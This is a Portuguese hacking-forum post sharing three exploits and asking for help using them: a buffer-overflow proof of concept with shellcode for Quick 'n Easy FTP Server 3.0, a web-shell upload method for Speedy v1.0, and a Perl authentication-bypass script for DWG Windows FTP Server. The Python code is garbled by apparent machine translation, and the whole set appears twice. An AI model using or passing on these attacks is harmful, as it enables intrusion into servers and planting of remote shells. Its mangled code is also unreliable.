Olá pessoa encontrei esses Exploits e vim compartilhas com você. E ao mesmo tempo pessoa a ajuda de você para me ajudar a entede como configuralos e usalos pois n tenhomuito conhecimento
Os sistemas vulneráveis :
n * Quick 'Easy FTP Server versões
Exploit:
#! / usr / bin / python
n # Quick 'Easy FTP Server 3.0 ( LIST) 0 dia PoC explorar
# Proof of Concept : execute calc.exe
# Testado em 2000 SP0 polonês
# Bug encontrado por H07
# Data : 18.07.2006
de importação socket *
host = "127.0.0.1"
port = 21
user = " H07 "
password = "open"
adr1 0x01ABED9A # ~ = Endereço do shellcode
adr2 = 0x7FFDF020 # ponteiro RtlEnterCriticalSection
shellcode = (
# chars ruins: 0x00 0x0D 0x0A 0x5c 0x2F
# reconstrução bloco PEB
edx mov dword # , 0x7FFDF020 ; EDX <- ponteiro RtlEnterCriticalSection
# mov dword [ edx ], 0x77F8AA4C ; RtlEnterCriticalSection < ponteiro - valor original
#...
\ " Xba \ x20 \ xf0 \ xfd \ x7f \ xc7 \ x02 \ x4c \ xaa \ xf8 \ x77 "
"\ x33 \ xC0 \ x50 \ X68 \ X63 \ x61 \ \ x6C X63 \ x54 \ x5B \ x50 \ x53 \ xB9 "
\ " XAD \ xaa \ x01 \ x78 "# Endereço do system () função ( polonês SP0 2000 )
"\ \ xFF XD1 \ XEB \ xF7 ")
intel_order def ( i):
a = chr ( i% 256)
i = i> > 8
b = chr ( i% 256)
i = i> > 8
c = chr ( i% 256)
i = i> > 8
d = chr ( i% 256)
str = "% c % c % c % c " % (a , b, c, d)
str retorno
s = socket ( AF_INET, SOCK_STREAM)
s.connect ( (host , port) )
s.recv impressão ( 1024)
s.send (" usuário% s \ r \ n " % (user) )
s.recv impressão ( 1024)
s.send ( "pass % s \ r \ n " % (password) )
s.recv impressão ( 1024)
buffer = "Lista "
buffer + = "?"
buffer + = "* A " 267
+ buffer = intel_order ( adr1 )
+ buffer = intel_order ( adr2 )
# EDX <- adr2 (ponteiro RtlEnterCriticalSection )
# ECX <- adr1 ( endereço do shellcode )
# MOV DWORD PTR DS: [ EDX ], ECX ( reescrever ponteiro RtlEnterCriticalSection )
# MOV DWORD PTR DS: [ ECX 4 ], EDX ( exceção e saltar para shellcode )
buffer + = \ " X90 " shellcode * 300 +
+ buffer = "\ n \ r "
s.send (buffer)
s.recv impressão ( 1024)
s.close ()
__________________________________________________ ________________________
Speedy v1.0 Remote Shell Upload Vulnerability
# Author: ViRuS Qalaa
# Email: h1g@hotmail.it
# My Sites : Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... & Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
# Script home: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR & ViRuS KSA>>>X-MaN HaCk3r TeaM
:::::::::::::::::::::::::
=================Exploit=================
DorK:No DorK In MY Exploit
First Upload your shell.php.gif on The Script Speedy 1,0
----exploit----
I will show you the direct download link list in your browser and enjoy Blcl
your link shell licke
http://{localhost}/{path}/uploads/Speedy_7296144526.gif
__________________________________________________ __________________________________________________ ____________
Windows FTP Server Exploit
# Title: WINDOWS FTP SERVER by DWG (Auth Bypass)
# EDB-ID: 12119
# CVE-ID: ()
# OSVDB-ID: ()
# Author: chap0
# Published: 2010-04-09
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
view source
print?
# Exploit Title: WINDOWS FTP SERVER by DWG (Auth Bypass)
# Date: April 09, 2010
# Software Link: [Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
# Version: v 1.4
# Tested on: Windows XP SP3
# Author: chap0
# Email: chap0x90[at]gmail[dot]com
# Site: [Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
#
# Windows FTP Server by DWG Software is vulnerable to
# authentication-bypass that will allow attackers to
# connect with any username and password.
# This give attackers full access to the Top Level
# directory of the ftp server.
#
# Greetz and many thanks to all Exploit-DBers and GOD gets the Glory
#
#
#!/usr/bin/perl
use IO::Socket;
$luser = "evil";
$pass = "hacker";
$mysock = IO::Socket::INET->new(PeerAddr =>'192.168.2.6', PeerPort => '21', Proto => 'tcp');
print "Connecting with a bad credentials. . .\n";
sleep(1);
print $mysock "USER $luser\r\n";
print $mysock "PASS $pass\r\n";
print "Making HACKED folder . . .\n";
sleep(2);
print $mysock "MKD HACKED\r\n";
print "DONE . . .\n";
sleep(1);
Os sistemas vulneráveis :
n * Quick 'Easy FTP Server versões
Exploit:
#! / usr / bin / python
n # Quick 'Easy FTP Server 3.0 ( LIST) 0 dia PoC explorar
# Proof of Concept : execute calc.exe
# Testado em 2000 SP0 polonês
# Bug encontrado por H07
# Data : 18.07.2006
de importação socket *
host = "127.0.0.1"
port = 21
user = " H07 "
password = "open"
adr1 0x01ABED9A # ~ = Endereço do shellcode
adr2 = 0x7FFDF020 # ponteiro RtlEnterCriticalSection
shellcode = (
# chars ruins: 0x00 0x0D 0x0A 0x5c 0x2F
# reconstrução bloco PEB
edx mov dword # , 0x7FFDF020 ; EDX <- ponteiro RtlEnterCriticalSection
# mov dword [ edx ], 0x77F8AA4C ; RtlEnterCriticalSection < ponteiro - valor original
#...
\ " Xba \ x20 \ xf0 \ xfd \ x7f \ xc7 \ x02 \ x4c \ xaa \ xf8 \ x77 "
"\ x33 \ xC0 \ x50 \ X68 \ X63 \ x61 \ \ x6C X63 \ x54 \ x5B \ x50 \ x53 \ xB9 "
\ " XAD \ xaa \ x01 \ x78 "# Endereço do system () função ( polonês SP0 2000 )
"\ \ xFF XD1 \ XEB \ xF7 ")
intel_order def ( i):
a = chr ( i% 256)
i = i> > 8
b = chr ( i% 256)
i = i> > 8
c = chr ( i% 256)
i = i> > 8
d = chr ( i% 256)
str = "% c % c % c % c " % (a , b, c, d)
str retorno
s = socket ( AF_INET, SOCK_STREAM)
s.connect ( (host , port) )
s.recv impressão ( 1024)
s.send (" usuário% s \ r \ n " % (user) )
s.recv impressão ( 1024)
s.send ( "pass % s \ r \ n " % (password) )
s.recv impressão ( 1024)
buffer = "Lista "
buffer + = "?"
buffer + = "* A " 267
+ buffer = intel_order ( adr1 )
+ buffer = intel_order ( adr2 )
# EDX <- adr2 (ponteiro RtlEnterCriticalSection )
# ECX <- adr1 ( endereço do shellcode )
# MOV DWORD PTR DS: [ EDX ], ECX ( reescrever ponteiro RtlEnterCriticalSection )
# MOV DWORD PTR DS: [ ECX 4 ], EDX ( exceção e saltar para shellcode )
buffer + = \ " X90 " shellcode * 300 +
+ buffer = "\ n \ r "
s.send (buffer)
s.recv impressão ( 1024)
s.close ()
__________________________________________________ ________________________
Speedy v1.0 Remote Shell Upload Vulnerability
# Author: ViRuS Qalaa
# Email: h1g@hotmail.it
# My Sites : Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... & Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
# Script home: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR & ViRuS KSA>>>X-MaN HaCk3r TeaM
:::::::::::::::::::::::::
=================Exploit=================
DorK:No DorK In MY Exploit
First Upload your shell.php.gif on The Script Speedy 1,0
----exploit----
I will show you the direct download link list in your browser and enjoy Blcl
your link shell licke
http://{localhost}/{path}/uploads/Speedy_7296144526.gif
__________________________________________________ __________________________________________________ ____________
Windows FTP Server Exploit
# Title: WINDOWS FTP SERVER by DWG (Auth Bypass)
# EDB-ID: 12119
# CVE-ID: ()
# OSVDB-ID: ()
# Author: chap0
# Published: 2010-04-09
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
view source
print?
# Exploit Title: WINDOWS FTP SERVER by DWG (Auth Bypass)
# Date: April 09, 2010
# Software Link: [Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
# Version: v 1.4
# Tested on: Windows XP SP3
# Author: chap0
# Email: chap0x90[at]gmail[dot]com
# Site: [Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
#
# Windows FTP Server by DWG Software is vulnerable to
# authentication-bypass that will allow attackers to
# connect with any username and password.
# This give attackers full access to the Top Level
# directory of the ftp server.
#
# Greetz and many thanks to all Exploit-DBers and GOD gets the Glory
#
#
#!/usr/bin/perl
use IO::Socket;
$luser = "evil";
$pass = "hacker";
$mysock = IO::Socket::INET->new(PeerAddr =>'192.168.2.6', PeerPort => '21', Proto => 'tcp');
print "Connecting with a bad credentials. . .\n";
sleep(1);
print $mysock "USER $luser\r\n";
print $mysock "PASS $pass\r\n";
print "Making HACKED folder . . .\n";
sleep(2);
print $mysock "MKD HACKED\r\n";
print "DONE . . .\n";
sleep(1);